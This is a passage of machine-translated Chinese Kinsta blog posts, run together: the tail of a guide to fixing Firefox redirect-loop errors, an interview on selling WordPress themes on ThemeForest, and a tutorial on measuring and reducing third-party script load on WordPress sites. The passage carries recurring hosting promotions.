- 将当前文件重命名为。htaccess_old 来禁用它(同时仍然保留它作为备份)。
此时,您可以尝试重新访问您的站点。如果可以,打开你的 WordPress 仪表盘,进入设置>永久链接。然后,点击保存更改(不更改任何设置)。这个设置将强制 WordPress 生成一个新的。htaccess 文件。
如果您无法访问您的 WordPress 仪表盘,您可以通过以下方式手动重新创建此文件:
- 创建一个名为的新文件。使用你的 FTP 客户端。
- 将下面的代码片段添加到文件中。
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Nginx。会议文件
如果您的主机使用 nginx,那么故障诊断可能会有点棘手,因为配置文件的内容和位置(通常是 Nginx 服务器上的 nginx.conf )会因主机提供商而异。因此,我们建议向您寻求帮助。
如果你用 Kinsta 托管,你可以在你的站点仪表板上进入重定向工具,看看你是否不小心设置了一个错误配置的重定向。或者,联系我们的支持团队,我们很乐意为您检查。
An example of a misconfigured redirect in Kinsta’s redirect tool.
如果你仍然对 Nginx 中的“页面没有正确重定向”和编辑有问题。conf 文件没有解决它们,最可能的问题是您添加了一系列重写指令,导致了无限重定向循环。
这个问题在任何重写规则中都可能发生,但是当编写规则从 HTTP 移动到 HTTPS 或者重定向 WWW 到 non-WWW 时,这是意料之中的(反之亦然)。
如果您最近在您的 nginx.conf 文件中添加了新的重写规则,这些规则很可能就是罪魁祸首。尝试移除它们,看看是否能解决问题。如果是这样,那么您知道您添加的重写规则的语法有问题。
如何修复 PHP 中的“页面没有正确重定向”
如果您在 PHP 中看到“页面没有正确重定向”,两个常见的故障排除步骤是:
检查您的重定向
如果您已经使用 PHP 设置了重定向,比如通过 header() 函数,这可能是重定向问题的常见来源。
您的第一步应该是调试该函数,并确保您没有以创建重定向循环的方式设置它。按照我们已经讨论过的步骤来修复任何错误的配置。
检查登录/会话问题
许多 PHP 问题都是由登录和会话行为引起的——例如,一个函数检查用户是否登录,如果用户没有登录,就将他们重定向到登录页面。
如果您没有正确地设置会话检查,您实际上可以将用户困在一个无限重定向循环中。
看过这条消息吗?😅了解如何为 WordPress 站点、Nginx 和 PHP 解决这个问题,就在这里⬇️ 点击推文
摘要
“页面没有正确重定向”错误是 Mozilla Firefox 特定的错误消息,当页面遇到无限重定向循环时会出现。与 Chrome 中的 ERR_TOO_MANY_REDIRECTS 错误消息相同。
要解决此错误,您应该先尝试两件事:
- 清除您的 Firefox 浏览器缓存。
- 为您看到错误的站点清除 cookies。
如果你有一个 WordPress 站点,并且在尝试了这两个步骤后错误信息仍然存在,你可以按照这个指南中 WordPress 特有的步骤来进一步调查这个问题。并且确保遵循重定向最佳实践,以最大限度地减少最初遇到这种错误的机会。
关于修复 WordPress 或其他情况下的“页面没有正确重定向”错误,您还有什么问题吗?留下评论让我们知道!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
在 ThemeForest 上销售 5 年——利弊
随着超过 43.3%的网站使用 WordPress,这个领域的竞争会非常激烈!对于许多新的 WordPress 主题开发者来说,一个很大的难题是他们是否应该独立出去或者在一个已经建立的市场上发布他们的作品。今天,我们很荣幸地采访了亨利·罗斯,他是《T4》ThemeREX 的首席执行官,也是 ThemeForest 上的一位权力精英作家。他将与我们分享他五年来在 ThemeForest 上销售主题的第一手经验,以及该平台的一些利弊。如果你还在考虑走哪条路,希望这能帮助你做出更明智的决定。
主题森林+ WordPress
对于那些可能不知道的人来说, ThemeForest 由 Envato 所有,是一个在线市场,在这里你可以买卖流行的 CMS ( 内容管理系统)产品的 HTML 模板和主题,如 WordPress、 Joomla 和 Drupal 。根据 Alexa 的数据,他们被列在世界前 1000 家网站中,每月接待数百万的访问者。他们绝对是同类市场中最大的市场之一。
ThemeForest WordPress
写这篇文章时,ThemeForest 上有超过 10,000 个 WordPress 主题。他们有一种你可能称之为“需要彼此才能生存”的关系。根据来自 Freemius 的研究,虽然 ThemeForest 上只有 28%的主题是 WordPress 主题,但是 WordPress 主题带来了 80.5%的总收入。你可以购买任何东西的主题,从企业电子商务主题到婚礼主题。为了好玩,我们拉了一张 2008 年 ThemeForest 的截图,当时他们只有 14 个 WordPress 主题。
ThemeForest 2008
为什么会大幅增长?这很自然,因为 WordPress 主题很容易开发。此外,企业家和小企业倾向于使用 WordPress 而不是其他内容管理系统,因为它很容易使用。根据 W3Techs 的调查, 65.1%的 CMS 用户正在使用 WordPress。你也可以查看我们的深入了解更多关于 WordPress 的历史。
然而,由于 ThemeForest 上有如此多的 WordPress 主题,这使得竞争更加激烈。你不能只列出你的主题,然后看着销售开始滚滚而来。为了成功,森林的作者和开发者必须在他们的策略上做一些改变。如果你想登上销售榜的顶端,不建议你把整个生意都放在森林上,因为这可能有风险。它还建议你为你的品牌进行额外的营销活动,即使你是一个权力精英作家。
什么是权力精英作者?
Envato 有他们所谓的精英项目 T1。这是为了奖励总销量超过一定门槛的卖家。第一个级别是,一旦你的总销售额超过 75,000 美元,你将获得一枚精英徽章、12 个月 tuts+订阅以及你的卖家资料中的 Google Analytics。这将允许您添加 UTM 参数到营销活动中,并查看实际转换的内容。关卡最高可达 2500 万美元,你可以选择自己的冒险经历,然后由 Envato 买单。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
Envato elite program
虽然这些价格听起来有些离谱,但是在 WordPress 主题市场上还是有很多钱的。市场上销量第一的主题 Avada 已经卖出了 300,000 本!如果你计算一下 60 美元一个许可证,仅仅一个多功能主题的销售额就超过了 2000 万美元。然而,他们也有时间优势,因为他们有一个非常好的品牌和主题。现在所有的竞争会变得更加困难。
在主题森林上销售的好处
今天我们采访的是销量超过 37,000 的权力精英作家 ThemeREX T1。他们在 ThemeForest 上有超过 156 个 WordPress 主题,评分为 4.5 分。如果你想在主题森林上出售你的设计,在采取任何行动之前,你应该了解所有的利弊。有谁比一个已经很有名气的卖家更适合接受建议呢?
ThemeRex power elite author
以下是他们的首席执行官亨利与我们分享的在 ThemeForest 上销售主题的一些优点:
1.稳定性
如果你正在建立一个网页设计业务(我们指的是严肃的业务,而不是在你心情好的时候时不时地创建模板),Envato 会给你带来稳定性和对光明未来的信心。
2.交通拥挤
Envato 有着疯狂的流量。根据 SEMRush 的说法,他们每月有超过 900 万的有机访问者,这还只是估计桌面流量。所以你可以放心地认为这是很多!
Traffic analytics for ThemeForest.net
这对你来说意味着什么?你的主题会被目标观众看到,很多相关的人。这种流量不是随机的。浏览你的主题的用户对主题有广泛的了解。有时候他们似乎比你知道的更多。那么,你应该怎么做呢?试着让他们相信你的产品是好的。
我们以 ThemeREX 为例。我们从零开始,我们的流量很快增长到每月 20 万次访问。请记住,大部分流量来自演示。陷阱是大多数客户永远不会看到你的主页。如何避免?在演示中向他们展示更多的模板,或者使用横幅等。确保你的手指在交通馅饼。
Theme demo
3.选择您的价格
Envato 给你选择。你可以自由选择物品的价格。例如,你可以选择最低价格,以一毛钱的价格出售你的宏伟、耗时的作品。这将是你为命名建筑和攀登顶峰所做的牺牲。或者,你可以反其道而行之。你可以像图表高端的一些供应商一样,把你的价格定在每个主题几百元。
4.更高的独家收入
你必须做出另一个重大选择与恩瓦托合作。你想在任何地方销售你的主题还是只在 Envato 上销售?区别在于收益。如果你到处提供你的产品,你会得到 50%的收入。也许你会对此感到满意。但大多数 Envato 合作伙伴选择独家经营,只在那里销售他们的主题。然后费用可以降低到 12.5% ,但这也取决于总销售额。所以,你最好三思,什么对你更有利。了解更多关于 Envato 作者费。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Envato author fees
5.恩瓦托希望你成功
Envato 关心它的供应商。团队希望你被认可为精英/权力精英作者。当然,你创造的销售额越多,他们的收入就越多。你会得到很多额外津贴,徽章,他们会把你列入他们的名人墙上,在他们的博客上发布你的采访,以及做许多其他事情。例如,当你的新主题发布时,Envato 会在主页上展示它。通过这种方式,你的新主题在最初的几天里会有很高的曝光率。
6.通过支持赚取额外收入
你可以在支持上筹到好多钱,只要你超有效率。客户现在为森林上的额外支持付费,因此可以说支持部门支付他们的工资。这真的很好。阅读更多关于主题森林支持政策的信息。
ThemeForest pay for support
7.伟大的社区
最后一个专业是 Envato 周围的社区。你成为它的一部分。你有机会与有相似兴趣的开发人员交谈,向他们学习,分享想法,“窃取”创造性的想法,等等。
在森林上销售的缺点
虽然对于作者来说,森林有很多好处,但也有一些坏处:
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
1.主题拒绝
你可能会收到 Envato 的多次拒绝,因为他们的标准非常高,有时变化太突然。拒绝让你感到沮丧,有时你开始认为事情对你来说太复杂了。这只是论坛上的一个例子。
Rejected on ThemeForest
但是你应该明白,Envato 有一个很好的理由来满足他们的要求。他们必须保持一定的质量水平。把这当成对你职业精神的挑战,你的工作会变得更好,你的专业水平也会变得更高。采纳,变得更强,你将赢得客户的心,这是 Envato 的目标。
2.无品牌
很多人(如果不是所有的供应商)讨厌匿名因素。我们每个人都有自己的抱负。但我们必须自愿报名参加。事实上,顾客从 Envato 购买而不是从你的品牌购买可能会令人恼火。你应该准备好收到一大堆支持票,上面写着你是 Envato 支持团队成员。这无助于你建立自己的品牌。任何东西都有它的价格,这是你应该为 Envato 给你的无数机会付出的代价。如果你想建立自己的品牌——自己做营销。
3.只是机器的一部分
你还记得蝎子乐队歌曲中的歌词吗“你是雨中的一滴,只是一个数字而不是一个名字……”这种感觉并不令人愉快,但事实是,即使他们希望你成功,你仍然是 Envato 机器中的一个齿轮。如果你进入社区论坛,你会看到供应商的帖子,他们讲述了他们的痛苦,如销售额下降(如下例)和其他对他们来说至关重要的话题。
Drop in sales
但是他们没有得到恩瓦托的回应。版主也不管。森林应该关心他们的作者,因为他们是 Envato 的引擎。这很可悲,但生意不是为牢骚满腹的人准备的。
4.扰乱定价
价格是另一个严重的问题。根据 Envato terms 的规定,每个人都可以对自己的产品制定自己的价格,这就足够公平了。但是一些作者把他们的产品作为最贵的商品出售,而另一些作者为了达到他们的营销目的,以几乎 0%的收入出售他们的主题。多皮肤模板也是很好的竞争者,因为它们可以用来以一个的价格建立很多网站。由于这种混乱的价格,许多人离开时感到受骗和失望。我们明白,我们不能因为别人的成功和我们的失败而责怪他们,但这种理解并不会让事情变得更容易。推荐阅读:如何为 WordPress 的产品或服务定价的 5 个技巧
5.很难成功
如果你只是打算开始与 Envato 的合作,那就做好准备迎接困难时期吧。我们不想吓跑你,但是今天进入森林非常困难。即使是最大的玩家也开始感觉到竞争对手的气息。用降价策略和高质量产品的泛滥市场来增加额外的价值可能会花费你一大笔钱。也不要寄希望于恩瓦托的任何回答。即使是权力精英作者也必须耐心等待,排队等待他们的问题得到回答。有时候,一封简单的是或否的邮件需要两三天才能得到回复。
6.需要额外的营销
如果你想在 Envato 上生存,你必须付出额外的营销努力来让你的主题曝光。一点数学:ThemeForest 需要至少 200 万额外的人来购买他们的 WordPress 产品才能维持运营。200 万人是一个巨大的数字,这只是为了在没有任何增长的情况下保持业务不变。你可能会说 WordPress 的需求在增长,人们变得更加依赖网站和互联网,但是谁知道需求会增长到什么程度。
摘要
任何生意都有利有弊,尤其是涉及这么多人的大生意。除了上面提到的缺点之外,大多数 Envato 供应商都很乐意成为其社区的一部分,并围绕它开展业务。如果你正在犹豫是否要和 Envato 碰碰运气,我们只能说一件事。采取行动并失败总比无所事事要好。也许你是森林中未来的新星。我们祝你好运!有自己在主题森林上销售的故事或经历吗?我们很想听听下面的故事。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
在你的 WordPress 站点上分析第三方性能
很多优化文章关注于如何提高你的 WordPress 站点的速度,比如优化你的图片或者转移到一个更快的主机上。虽然这些都很重要,但今天我们想和你讨论第三方性能的影响,以及它如何影响你的 WordPress 站点。基本上,您从站点外部调用的任何东西都有加载时间的后果。让这个问题变得更糟的是,其中一些只是间歇性地缓慢运行,这使得识别问题更加困难。今天,我们将探索识别和分析第三方服务和性能问题的方法。
- 什么是第三方外部服务?
- 识别外部服务
- 分析持续的第三方性能问题
- 分析间歇性第三方性能问题
什么是第三方外部服务?
第三方外部服务可以被认为是从你自己的服务器之外与你的 WordPress 站点通信的任何东西。以下是我们经常遇到的一些常见例子:
- Twitter、脸书和 Instagram 等社交媒体平台( widgets 或转化像素)
- 第三方广告网络,如 Google Adsense、Media.net、BuySellAds、亚马逊联盟
- 像谷歌分析、疯狂鸡蛋、Hotjar 这样的网站分析
- A/B 测试工具,如 Optimizely、VWO、Unbounce
- WordPress 评论系统如 Disqus、 Jetpack 、脸书评论
- 备份和安全工具如 VaultPress、Sucuri、CodeGuard
- 社交分享工具如 SumoMe,HelloBar
- CDN 网络如 KeyCDN、亚马逊 CloudFront、CDN77 和 StackPath
- 外部托管的 Javascript
外部服务如何导致问题
外部服务通常会带来两个问题。一个是由纯粹的数量带来的,另一个与等待他们加载有关。
- 如果你有很多外部服务,你需要加载所有的服务,并在每次页面加载时等待来自它们的信息。你接到的电话越多,你等待的时间越长,你自己的服务器上的负载就越高,你遇到第二个问题的几率就越大。
- 在某些情况下,页面加载会一直等到站点和外部服务之间的数据传输完成。如果在标题中调用了服务,并且出现了服务中断,那么您的页面将拒绝加载。
当然,可以做一些事情来加快速度,比如异步加载脚本,但是我们将在后面讨论这个问题。在大多数情况下,庞大的数量是您在调试第三方性能问题时必须处理的最大问题之一。
识别外部服务
识别这些服务并不太困难。最简单的方法之一是打开一个网站速度测试工具,无论是 Pingdom 、 GTmetrix 、WebPageTest 还是 Chrome Devtools,通过它运行你的网站。您应该会看到已加载的资源列表。将鼠标悬停在一个资源上,如果它的开头不包含您的域名,那么它就是您正在调用的外部服务或外部资产。
下面你可以看到缩小版的 jQuery 是从外部源(https://ajax.googleapis.com)加载的。
External service – JavaScript
如果你不知道外部服务是做什么的,你可以试着浏览到主域或者在 Google 中搜索它的名字,因为开发者或者相关的公司应该会出现。这是确定服务是否合法的好方法。正如您在下面看到的,搜索 jQuery 文件会出现一些知名的公司,比如 jQuery 和 Google,它们描述了托管这个文件的情况。所以你可能是安全的。
jQuery external script
分析持续的第三方性能问题
如果你的网站总是很慢,你需要找出是什么让它慢下来。如果你的网站有间歇性的问题,那就有点困难了。先说连续慢。我们在这里假设你的网站很慢是因为外部服务。虽然许多速度问题可能是由外部服务引起的,但还有大量其他问题,因此这可能无法解决您的问题。
If your #WordPress site is always slow 🐌, you should figure out why right?Click to Tweet
首先,您需要确定是否有任何服务需要很长时间来加载,以及它如何影响您的站点的性能。因此,我们建立了一个测试网站,托管在 Kinsta 上,其中包含以下内容:
- 2 个谷歌广告
- 脸书喜欢盒子
- Instagram Widget
- 质疑意见
- 脸书转换跟踪像素
- 谷歌分析
WordPress test site
这将允许我们逐个删除每个服务,并向您展示每个服务对您的整体站点负载的影响程度。我们还将分享一些加载它们的替代方法的策略。然后你可以将同样的策略应用到你自己的 WordPress 站点上。我们通过 Pingdom 运行了测试站点,您首先可以看到的是“按域划分的内容大小”和“按域划分的请求”如果您看到的请求不是来自您的域名,很可能是外部服务或外部资产。这是一个开始的好地方。正如你在下面看到的,static.xx.fbcdn.net 有 37 个请求,这并不好!
Pingdom external services – (speed test)
网站加载时间也是 1.94 秒,这实在是不太好,因为正如你在上面看到的,测试网站上没有任何内容。这是一个规模较小的测试,有助于您更好地分析第三方性能。WordPress 网站越大,问题就越大。但从根本上说,大多数问题都可以用类似的方式解决。
解决谷歌广告
我们首先要解决的是 Google Adsense。通常,当你运行一个速度测试时,你可以将鼠标悬停在每个条上,看看加载过程的每个部分花费了多长时间。你应该寻找特别长的酒吧(与其他酒吧相比)和酒吧只有在特定酒吧结束后才开始加载的地方——这些是你的瓶颈。一旦您发现某个元素花费的时间太长或者阻止了其他资源的加载,您需要弄清楚它为什么会在那里,以及它来自哪里。
这可能有点困难,对服务的调用可能被编码在你的主题中,或者它可能来自一个插件。然而,正如我们之前提到的,还有一个绝对量的问题。如果我们看一下下面来自 pagead2.googlesyndication.com和 tpc.googlesyndication.com的请求,我们可以看到这些条相当短,意味着它们没有造成太多的延迟。其中一些确实有更长的接收时间(绿色条),这是网络浏览器从服务器接收数据所花费的时间。最大的问题是一旦你把所有的请求加在一起。****
我们喜欢称 Google AdSense 为可变的第三方服务。这是因为每次加载页面时,都会加载不同数量的请求和资产。这使得很难确定是什么导致了性能问题,因为每次运行速度测试都会有所不同。下面是广告产生的一些第三方请求的一个片段。它们还生成重定向,它们有自己的延迟。
Google AdSense external requests
你可能认为仅仅两个广告就能产生如此多的请求是疯狂的,但这就是它们的工作方式。
选项 1–异步加载
您的第一个选择是确保它们异步加载。async 属性基本上告诉浏览器在不减慢 HTML 解析的情况下立即开始下载资源。一旦资源可用,HTML 解析就会暂停,以便可以加载资源。默认情况下,Google AdSense 新生成的代码会有这个属性,但是如果您的代码仍然是几年前的,我们建议您检查一下。
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- nogluten-top-right-page-300x250 -->
<ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-xxxxxxxxxxx" data-ad-slot="9805695044" data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
请务必查看我们关于消除渲染阻塞 JavaScript 和 CSS 的另一篇文章。这可以帮助你更好地理解脚本是如何在你的 WordPress 站点上加载和运行的。
选项 2–删除它们
你的另一个选择是完全删除谷歌广告。显然,对于一些依赖第三方广告收入的网站来说,这不是一个选项。但我们看到电子商务网站在他们的网站上投放 AdSense 广告,只是为了快速赚钱。您应该意识到这方面的性能问题。如果你在销售产品或服务,一个谷歌广告可能弊大于利,损害你的主要收入来源。对于博客作者,你也可以看看联盟广告和 AdSense。很多时候,对于联盟广告,你可以从你的 CDN 加载它们,并且只有一个请求。
在这个例子中,我们将删除广告,向你展示两个小广告是如何影响你的 WordPress 网站的整体性能的。因此,我们在删除它们后运行了另一个速度测试,正如你所看到的,我们的加载时间从 1.94 秒下降到 909 毫秒!我们的请求从 185 个减少到 138 个,我们的总页面大小从 2 MB 减少到 1.7 MB。
After removing Google AdSense (speed test)
没错!两个小广告增加了大约一秒钟的总加载时间。这就是为什么除非你的收入模式围绕第三方广告,否则不要把它们放在你的 WordPress 网站上。如果你有一个广告网络的问题,而你有一个插件为你处理广告网络,禁用这个插件就有可能解决这个问题。如果它是在主题中编码的,你需要修改你的主题文件。如果你是开发者,我们建议你做以下两件事(如果你不在这里,你可以了解更多关于如何找到一个好的 WordPress 开发者)。
像盒子一样处理脸书
接下来要看的是引起所有那些static.xx.fbcdn.net和scontent.xx.fbcdn.net请求的脸书类盒子。我们可以看到,条形相当短,这意味着它们不会造成太大的延迟。然而,一旦你把它们加在一起,这就是问题所在。同样,这是一个纯粹的量的问题。
Facebook widget requests
我们建议每个网站所有者远离脸书像框!它不仅会对外部 JavaScript 生成大量请求,还会加载大量图像。这里有三个建议可以更好地解决这个问题。
T3】
选项 1–异步加载
要使用脸书 like box,你或开发者必须在你的 WordPress 站点的标题中添加以下代码。也有一些 WordPress 小部件添加了这个框。
<script>(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.9&appId=1697897870426976";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
上面代码的问题是它不能异步加载。async 属性基本上告诉浏览器在不减慢 HTML 解析的情况下立即开始下载资源。一旦资源可用,HTML 解析就会暂停,以便可以加载资源。我们不确定为什么脸书没有把这个属性添加到脚本中,但是你可以在下面看到修改后的版本,它将异步加载。
<script>(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.async=true; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.9&appId=1697897870426976";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
如果您在 Pingdom 中检查,您可能不会注意到加载时间的差异,但是您的访问者肯定会注意到,因为它会影响脚本和资产的加载方式/时间。
选项 2–使用图像横幅代替
下一个建议是用一个简单链接到你的脸书页面的横幅图片代替脸书 like 框。这将立即把 40 多个请求减少到 1 个,您将不再有外部依赖性。你可以通过这种方式变得非常有创意,这是设计和性能之间的一个很好的平衡。
选项 3–摆脱它
最后,最后一个选择是完全摆脱它。我们在我们的测试站点上做到了这一点,正如您在下面看到的,它将我们的加载时间从 909 毫秒降至 786 毫秒。它将整体页面重量从 1.7 MB 降至 1.0 MB,并将请求总数从 138 个降至 78 个。这里需要指出的一点是页面权重的降低。脸书喜欢的盒子增加了 700 KB!这太糟糕了。
After removing Facebook like box (speed test)
处理 Instagram 小工具
接下来要看的是 Instagram 小部件。在我们的例子中,我们使用免费的 Instagram Feed 插件。插件实际上不是问题,而是来自 scontent.cdninstagram.com的请求产生了。我们可以看到,条形相当短,这意味着它们不会造成太大的延迟。然而,一旦你把它们加在一起,这就是问题所在。同样,这是一个纯粹的量的问题。你可以看到这里形成了一种模式。WordPress 网站上的许多第三方性能问题不是来自单个请求的延迟,而是那些一开始就不关心性能的问题。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Instagram external requests
我们也建议人们远离 Instagram widget,除非你真的需要它,因为它会产生很多请求。这里有一些建议可以更好地解决这个问题。
选项 1–使用图像横幅代替
就像脸书的 like box 一样,除非你真的需要一个动态的 Instagram 小工具,否则就创建一个链接到你的 Instagram 页面的横幅。这将立即把 20 多个请求减少到 1 个,您将不再有外部依赖性。你可以通过这种方式变得非常有创意,这是设计和性能之间的一个很好的平衡。
选项 2——扔掉它
当然,你可以完全摆脱它。我们在我们的测试站点上做到了这一点,正如您在下面看到的,它将我们的加载时间从 786 毫秒降至 690 毫秒。它将整体页面重量从 1.0 MB 降至 814.3 KB,并将请求总数从 78 个降至 57 个。
After removing Instagram widget (speed test)
处理质疑意见
接下来要看的是 Disqus 的评论。在我们的例子中,我们使用免费的 Disqus 评论系统插件。Disqus 的一个大问题是它会产生大量的请求,并且必须为每个人的评论加载 gravatar。我们已经在关于如何加速 WordPress 评论的文章中详细讨论了这个问题。
你可能还想彻底禁用 WordPress 上的评论。
如果你是一个大的商业网站,你可能还需要付费来删除 Disqus 广告,如果你不这样做,最终会有更多的请求出现在你的网站上。您可以在下面看到它生成的一些请求的一小部分。
Disqus external requests
这里有一些处理评论的建议。
选项 1–延迟加载 Disqus 注释
惰性加载是直到用户向下滚动页面时才加载资产和脚本的过程。这确保了第一页的加载速度更快。你可以使用 Joel James 提供的免费 Disqus 条件加载插件轻松地延迟加载 Disqus 评论。事实上,我们在 Kinsta 的博客上使用了这个。我们在我们的测试网站上安装了该插件,正如您在下面看到的,它将我们的加载时间从 690 毫秒降至 603 毫秒。它将整体页面重量从 814 KB 降至 366.1 KB,并将请求总数从 57 个降至 24 个。有一点要指出的是大规模的页面权重降低!
After lazy loading Disqus (speed test)
选项 2–延迟加载本地 WordPress 评论
你的另一个最佳选择是延迟加载本地 WordPress 评论。Joel James 也是 lazy load Disqus 插件的开发者,他也有一个免费插件叫做 Lazy Load for Comments 。这与上面的方式非常相似。我们在我们的测试网站上安装了插件,正如你在下面看到的,它导致了几乎相同的加载时间减少。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
After lazy loading native WordPress comments (speed test)
解决脸书转换跟踪像素
最后,我们来看看脸书转换跟踪像素。显然,大多数人用这个来收集人们访问他们网站的数据,或者在运行脸书广告时跟踪转化率。因此,删除它可能并不总是一个选项,而且您确实无法做任何事情来提高它的性能。正如你在下面看到的,它负责生成 5 个不同的 HTTP 请求,不幸的是,它们不是最快的。
Facebook conversion tracking pixel external requests
我们将简单地删除它,向您展示它对您的网站性能的影响。将其从我们的网站上移除后,我们的加载时间从 611 毫秒降至 429 毫秒。它将整体页面重量从 367.5 KB 降至 343.2 KB,请求总数从 27 个降至 22 个。
After removing FB pixel (speed test)
上面的例子只是你可能在你的 WordPress 站点上运行的数千个外部服务中的几个。重要的是要看到每一个,并确定它对你的网站性能有多大影响。如你所见,仅仅一个坏苹果就能引起巨大的问题!
外部服务有助于提高性能
虽然大多数外部服务会损害网站的性能,但也有一些服务可以帮助网站。一个 CDN,比如 KeyCDN 或 Cloudflare,只需要很少的设置工作,就可以极大地提高站点的速度。查看我们的教程如何设置 key dn以及如何安装 Cloudflare 。在下面的例子中,我们向测试站点添加了 KeyCDN。如您所见,它又减少了 100 毫秒的加载时间。
After CDN (speed test)
进一步优化
然后,我们在 WordPress 网站上做了一些额外的优化,使我们获得了 100 的性能等级分数和 270 毫秒的加载时间。这些优化包括:
- 确保从 CDN 提供商加载所有内容。这意味着在本地托管 Google 字体并产生一个 HTTP/2 请求。
- 删除产生不必要的 HTTP 请求的附加资产,如表情符号、嵌入、jQuery 迁移等。我们使用了性能插件。
以下是一些更深入的优化教程:
- 如何禁用表情符号
- 如何禁用嵌入
- 如何修复利用浏览器缓存警告
- 如何从静态资源中移除查询字符串
- 如何用 New Relic 找到 WordPress 的性能瓶颈
- 8 个鲜为人知(但很有用)的 WordPress 性能插件
- 如何禁用 WordPress 插件(不能访问 WP-Admin)
After optimizations (speed test)
正如你所看到的,我们从 1.94 秒下降到 270 毫秒的加载时间!当然,你可能需要一些外部服务,每个企业都需要。但是重要的是不要忘记分析每一个。如果您发现加载时间过长,请联系负责该问题的开发人员或公司并提出问题。
防止失速装载
更大的问题是当一个脚本在完成自身加载时阻止加载。如果像这样的脚本包含在标题中,它可以让你的网站无限期地保持空白。因此,任何在页眉中不是绝对必要的东西都应该放在页脚中。这将允许您的网站在有问题的脚本开始加载之前就完全加载。如果您使用[wp_enqueue_script()](https://codex.wordpress.org/Function_Reference/wp_enqueue_script)函数(您应该这样做),您可以使用第五个参数来指示它应该在页脚中加载。
如果你注意到一个插件在页眉中无故加载了一个资产,你可以使用[wp_dequeue_script()](https://codex.wordpress.org/Function_Reference/wp_dequeue_script)将它从页眉中移除,然后使用wp_enqueue_script()以同样的方式注册它,但是是在页脚中。
利用谷歌标签管理器
帮助解决第三方性能问题的另一种方法是利用免费工具,如 Google Tag Manager 。这允许你在一个地方管理所有的脚本和标签。这样做的一些好处是,它们将异步加载,管理变得更容易,并且您可以为脚本加载的页面设置触发触发器。
Google Tag Manager firing triggers
然而,这也有一些缺点:
谷歌标签管理器不会减少你的网站或应用上的标签数量,但它确实简化了管理标签的任务。对于网站,谷歌标签管理器异步执行,可以配置为仅在需要时触发标签,帮助您的页面更快地加载。(来源
如果你使用谷歌标签管理器,你还会有另一个 HTTP 请求和 DNS 查询到【googletagmanager.com】T2,尽管这几乎可以忽略不计。
googletagmanager.com request
我们建议查看 Google Tag Manager,寻找那些拥有大量第三方服务和集成的大型未优化网站。对于有开发人员的小型站点,使用 GTM 很可能看不到太多的性能提升。
分析间歇性第三方性能问题
解决间歇性问题的方法与解决持续性问题的方法是一样的,但是找出问题的根源要困难得多。实现上面的解决方案可能已经有所帮助了,但是最好还是知道是什么导致了这个问题。你可以用做这件事的一个工具是新遗迹(需要许可证)。下面你可以看到一些第三方广告网络的例子,以及在一段时间内与它们相关的高负载时间。
New Relic Monitoring – external ad network
具有讽刺意味的是,New Relic 也会导致性能问题。在这种情况下,我们建议将其用于故障排除和零星监控,而不是连续使用。你也可以使用像 GTMetrix 这样的工具在你的网站上安排每小时的速度检查。几天后,您可以回来查看,并在一个漂亮的小图表中看到结果:
GTmetrix reporting times
这告诉你当你的站点比平均速度慢的时候。我们将首先单击最右侧的尖峰,进入在该时间点创建的报告。然后,我们将查看瀑布图,以了解哪个资源产生了问题。请务必查看我们关于如何使用 GTmetrix 来诊断您站点上的问题的深度帖子。
GTmetrix waterfall chart
这里有一个资产,它似乎阻止了后续的资产,看看中间的绿色条。原来这是来自谷歌 Recaptcha 。632 毫秒看似一眨眼的时间,但实际上,这是一个的数字。一个真正的页面应该在 2 秒左右加载。其中超过三分之一被这一项资产占用。资产要么应该稍后加载,要么应该丢弃,以支持其他验证方法。
摘要
正如您所看到的,仅仅几个外部服务就可以产生巨大的影响。第三方性能不容忽视,它与现场和后端优化密切相关。不过值得庆幸的是,有很多事情可以做,尤其是当你涉及到一个开发者的时候。抛弃服务,调整它们以不同的方式加载,比如异步,以另一种方式提供同样的东西,比如横幅,所有这些都可以让你的网站更快!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
